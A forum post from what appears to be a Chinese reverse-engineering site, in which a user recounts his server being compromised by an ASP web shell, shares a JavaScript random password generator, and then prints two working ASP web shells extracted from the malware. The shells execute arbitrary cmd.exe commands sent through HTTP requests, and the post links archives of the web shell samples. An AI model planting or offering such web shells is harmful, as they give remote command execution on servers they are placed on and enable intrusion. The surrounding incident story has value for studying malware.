好友
阅读权限10
听众
最后登录1970-1-1
|
djwdj
发表于 2022-8-10 22:56
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
小学生的云机又中木马了,以前密码123456用了3年都没事,现在好乱,一周就中毒了,密码加了字母又加符号,还是中毒都已经改用随机密码了,待会儿就分享一个简单的密码生成。
之前中毒也看到一个乱码文件,没想太多,就直接删了,然后改密码。继续用。
这次又中毒了,所以决定看看。直接打开看不了,所以跑一下,在网页源码抓几个关键字bing一下,就知道这东西叫大马。我以为这个是一个叫大马的人做的病毒。看了好多文章才知道,这大型的叫大马,一句话病毒叫小马。
又看到很多写着无后门的病毒下了几个,在本地跑。结果都有后门,两个木马在互杀,电脑直接挂了。最后发现我电脑administrator不是管理员,电脑都无权限。还是不跑大马了。直接禁用iis。用火绒盾把残留的都关掉。
用net user添加回管理组,发现cmd没权限,想写bat,c盘没权限,d盘也没权限。还好用户目录是可以用的。写好后,右键管理员运行,重启就发现d盘可以随便用了。总之,不要信任何木马无后门。
大马的功能还不错,可以野利用,但是用f12,能看到不停连接其它肉机。火绒还发现在大马用xmlhttp发东西。但是好像用这功能,于是决定提取要的功能出来。提出来发现不运行,
还好以前看过asp,发现是大马改了涵数。定位了好久才找到。连shell都写在数组中,找了好久才凑够一个页面的源码。
小学生的密码生成器
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="MobileOptimized" content="320">
<title> 随机密码基</title>
<style>
@font-face {
font-family: "iconfont"; /* Project id */
src: url('data:application/octet-stream;base64,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') format('truetype');
}
.iconfont {
font-family: "iconfont" !important;
font-size: 16px;
font-style: normal;
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
}
.icon-copy:before {
content: "\e67f";
}
.form-row {
display: -ms-flexbox;
display: flex;
-ms-flex-wrap: wrap;
flex-wrap: wrap;
margin-right: -5px;
margin-left: -5px;
}
.shadow {
box-shadow: 0 .5rem 1rem rgba(0,0,0,.15)!important;
}
.col-md-6 {
position: relative;
width: 100%;
padding-right: 15px;
padding-left: 15px;
}
@media(min-width: 1200px){
html {
font-size: 138% !important;
}
.col-md-6 {
-ms-flex: 0 0 50%;
flex: 0 0 50%;
max-width: 50%;
}
}
*, ::after, ::before {
box-sizing: border-box;
}
.custom-select {
width:60%;
padding: 0.5rem 1rem;
background: #fff url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='4' height='5' viewBox='0 0 4 5'%3e%3cpath fill='%233e3f3a' d='M2 0L0 2h4zm0 5L0 3h4z'/%3e%3c/svg%3e") no-repeat right .75rem center/8px 10px;
-moz-appearance: none;
appearance: none;
}
.ck{
margin-bottom: 32px;
}
#zd{
width:100%;
}
.card-header button{
padding: 6px 12px;
border-radius: 33px;
}
.card-header {
text-align: center;
background: #ccc;
padding: 5px;
}
.card-body {
text-align: center;
}
#output{
font-weight: 700;
font-size:300%;
background: #f55;
color: #fff;
padding: 11px 33px;
}
#copycode{
border: 2px solid #f55;
background: #fff;
color: #f55;
}
#pw:active {
opacity: 0;
transition: 0s
}
#pw{
transition: all 2s;//:active按下动画
animation-name: animatetop;
animation-duration: 2s
}
@keyframes animatetop {
from { opacity:0}
to { opacity:1}
}
</style>
</head>
<body>
<div class="form-row">
<div class="col-md-6 shadow ">
<div class="input-group">
密码长度:
<select id="pgLength" class="custom-select">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6" selected>6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
<option value="32">32</option>
<option value="33">33</option>
<option value="34">34</option>
<option value="35">35</option>
<option value="36">36</option>
</select>
</div>
<div class="ck">
<input type="checkbox" checked id="chkl">
<label for="chkl">
小写字母(a..z)
</label>
<br>
<input type="checkbox" checked id="chku">
<label for="chku">
大写字母(A..Z)
</label>
<br>
<input type="checkbox" checked id="chkn">
<label for="chkn">
数字(0..9)
</label>
<br>
<input type="checkbox" id="chksc">
<label for="chksc">
特殊字符
</label>
<br>
<input type="checkbox" id="chkzd"><label for="chkzd">
自定义</label>
<div class=zd style="display:none">
<textarea id="zd" rows="6">字典</textarea>
<br>
<button id='zdl' onclick="generateZD();"> 生成字典1</button>
<button id='zd2' onclick="generateZD2();"> 生成字典2</button>
</div>
</div>
</div>
<div class="col-md-6">
<div class="card-header">
<button id='pw' onclick="generatePassword();"> 生成密码</button>
<button id="copycode"><span class="icon iconfont icon-copy"></span> 复制</button>
</div>
<div class="card-body">
<h5><span id="output">aC0*vN</span></h5>
</div>
</div>
</div>
<script>
function $(j8) {
return document.querySelector(j8);
}
function al(j,k) {
b="";
for (var i=j;i<k;i++){
b+=String.fromCharCode(i);
}
return b;
}
$( "#pgLength" ).onchange=generatePassword;
$( "#chkl" ).onchange=generatePassword;
$( "#chku" ).onchange=generatePassword;
$( "#chkn" ).onchange=generatePassword;
$( "#chksc" ).onchange=generatePassword;
$( "#chkzd" ).onchange=function(){
v=$(".ck .zd").style;
console.log("%c"+v.display, "color:red");
if($("#chkzd").checked){
v.display='';
}else{
v.display='none';
}
}
function generateZD(){
$("#zd").value=al(33,127);
}
function generateZD2(){
$("#zd").value=al(161,256);
}
function generatePassword(){
$("#output").innerText='';
var length = $("#pgLength").value;
var zd = $("#zd").value;
var string = "abcdefghijklmnopqrstuvwxyz";
var strUpper="ABCDEFGHIJKLMNOPQRSTUVWXYZ";
var numeric = '0123456789';
var punctuation = '!@#$%^&*()_+~`|}{[]\:;?><,./-=';
var password = "";
while( password.length<length ) {
entity1 = Math.ceil(string.length * Math.random()*Math.random()) - 1;
entity2 = Math.ceil(numeric.length * Math.random()*Math.random()) - 1;
entity3 = Math.ceil(punctuation.length * Math.random()*Math.random()) - 1;
entity4 = Math.ceil(strUpper.length * Math.random()*Math.random()) - 1;
entity5 = Math.ceil(zd.length * Math.random()*Math.random()) - 1;
if($("#chkl").checked || $("#chku").checked || $("#chkn").checked || $("#chksc").checked || $("#chkzd").checked) {
if($("#chkl").checked && password.length<length){
password += string.charAt( entity1 );
}
if($("#chku").checked && password.length<length){
password += strUpper.charAt( entity4 );
}
if($("#chkn").checked && password.length<length ){
password += numeric.charAt( entity2 );
}
if($("#chksc").checked && password.length<length){
password += punctuation.charAt( entity3 );
}
if($("#chkzd").checked && password.length<length){
password += zd.charAt( entity5 );
}
} else {
$("#chkn").checked=true;
//break;
}
}
if(password.trim()) {
$("#output").innerText=password.trim();
} else {
$("#output").innerText="请勾选选项!";
}
}
$('#copycode').onclick=function() {
var o=document.getElementById("output");
//o.select(); // 选择对象
//document.execCommand("Copy"); // 执行浏览器复制命令
const input = document.createElement('input');
document.body.appendChild(input);
input.setAttribute('value', o.innerText);
input.select();
document.execCommand('copy');
document.body.removeChild(input);
v=$("#copycode");
cc=v.innerHTML;
v.innerHTML="已复制";
v.style.transition='2s';
v.style.opacity=0;
setTimeout(function(){ v.innerHTML=cc;v.style.opacity=1; }, 2000);
}
generatePassword();
</script>
</body>
</html>
提取第一个大马,有二个方式,直接ws,和ws映射文本再读取文本
[截图放不出来]
<head>
<title>WebCmd</title>
<style type="text/css">
body,textarea,input{background:#000;color:#fff;}
textarea,input{border-radius:13px;border:1px solid #fff;margin:1px;}
</style>
</head>
<%
'Server.ScriptTimeout=999999999:Response.Buffer =true
On Error Resume Next
sub ShowErr()
If Err Then
RRS"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
Err.Clear
Response.Flush
End If
end sub
Sub RRS(str)
response.write(str)
End Sub
Dim ObT(13,2):ObT(0,0) = "Scripting.FileSystemObject":ObT(0,2) = "文件操作组件":ObT(1,0) = "wscript.shell":ObT(1,2) = "命令行执行组件":ObT(2,0) = "ADOX.Catalog":ObT(2,2) = "ACCESS建库组件":ObT(3,0) = "JRO.JetEngine":ObT(3,2) = "ACCESS压缩组件":ObT(4,0) = "Scripting.Dictionary" :ObT(4,2) = "数据流上传辅助组件":ObT(5,0) = "Adodb.connection":ObT(5,2) = "数据库连接组件":ObT(6,0) = "Adodb.Stream":ObT(6,2) = "数据流上传组件":ObT(7,0) = "SoftArtisans.FileUp":ObT(7,2) = "SA-FileUp 文件上传组件":ObT(8,0) = "LyfUpload.UploadFile":ObT(8,2) = "刘云峰文件上传组件":ObT(9,0) = "Persits.Upload.1":ObT(9,2) = "ASPUpload 文件上传组件":ObT(10,0) = "JMail.SmtpMail":ObT(10,2) = "JMail 邮件收发组件":ObT(11,0) = "CDONTS.NewMail":ObT(11,2) = "虚拟SMTP发信组件":ObT(12,0) = "SmtpMail.SmtpMail.1":ObT(12,2) = "SmtpMail发信组件":ObT(13,0) = "Microsoft.XMLHTTP":ObT(13,2) = "数据传输组件"
Function Cmd1Shell()
checked=" checked"
If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
ShellPath=Session("ShellPath")
if ShellPath="" Then ShellPath = "cmd.exe"
if Request("wscript")<>"yes" then checked=""
If Request("cmd")<>"" Then DefCmd = Request("cmd")
SI="<form method='post'>"
SI=SI&"SHELL路径:<input name='SP' value='"&ShellPath&"' Style='width:70%'> "
SI=SI&"<input class=c type='checkbox' name='wscript' value='yes'"&checked&">WScript.Shell"
SI=SI&"<input name='cmd' Style='width:92%' value='"&DefCmd&"'> <input type='submit' value='执行'><textarea Style='width:100%;height:440;' class='cmd'>"
If Request.Form("cmd")<>"" Then
if Request.Form("wscript")="yes" then
Set CM=CreateObject(ObT(1,0))
Set DD=CM.exec(ShellPath&" /c "&DefCmd)
aaa=DD.stdout.readall
SI=SI&aaa
else
On Error Resume Next
if ws="" Then Set ws=Server.CreateObject("WScript.Shell")
Set fso=Server.CreateObject("Scripting.FileSystemObject")
szTempFile = server.mappath("cmd.txt")
Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)
Set fs = CreateObject("Scripting.FileSystemObject")
Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0)
aaa=Server.HTMLEncode(oFilelcx.ReadAll)
oFilelcx.Close
Call fso.DeleteFile(szTempFile, True)
SI=SI&aaa
end if
End If
SI=SI&chr(13)&"</textarea></form>"
RRS SI
End Function
Cmd1Shell()
ShowErr()
%>
第二个大马,调用clsid拿到ws
<style>
body,tr,td {
margin-top: 5px;
background-color: #000000;
color: #006000;
font-size: 12px;
scrollbar-face-color: #232323;
scrollbar-arrow-color: #383839;
scrollbar-highlight-color: #383839;
scrollbar-3dlight-color: #dddddd;
scrollbar-shadow-color: #232323}
input,select,textarea {
border-top-width: 1px;
font-weight: bold;
border-left-width: 1px;
font-size: 11px;
border-left-color: #dddddd;
background: #000000;
border-bottom-width: 1px;
border-bottom-color: #dddddd;
color: #dddddd;
border-top-color: #dddddd;
font-family: verdana;
border-right-width: 1px;
border-right-color: #dddddd;
}
</style>
<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<%
Sub RRS(str)
response.write(str)
End Sub
Sub j(str)
response.write(str)
End Sub
function Cmdx()
j("<center><form method='post'> ")
j("<input type=text name='cmdx' size=60 value='cmd.exe'><br> ")
j("<input type=text name='cmd' size=60><br> ")
j("<input type=submit value='Sumbit'></form> ")
j("<textarea readonly cols=150 rows=27> ")
On Error Resume Next
j oScriptlhn.exec(request("cmdx")&" /c"&request("cmd")).stdout.readall
j("</textarea></center>")
end function
cmdx()
RRS"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
Err.Clear
Response.Flush
%>
可以拿来控自己电脑,但要小心别被木马利用了。本来想写个长文,分析代码,无奈键盘坏了,这文章在草稿里几天了。现在又不想写那么长了,真的累坏小学生了
我是真爱粉
差点就发帖了,忘记放大马了
都加密了,也不知道里面有没有藏着我的密码信息。百度找到一个解码工具,是16位的,要ms-dos,暂时解不了。可以response.write把部分解出来,有点麻烦
|
-
-
大马植入的东西.7z
37.75 KB, 下载次数: 7, 下载积分: 吾爱币 -1 CB
密码52pojie
-
-
大马.7z
73.52 KB, 下载次数: 9, 下载积分: 吾爱币 -1 CB
密码(默认:52pojie
-
-
webcmd2.7z
890 Bytes, 下载次数: 7, 下载积分: 吾爱币 -1 CB
密码(默认:52pojie
-
-
webcmd.7z
1.4 KB, 下载次数: 6, 下载积分: 吾爱币 -1 CB
压缩密码(默认:52pojie
免费评分
-
查看全部评分
|
[复制链接]
|
发表于 2022-8-13 18:40
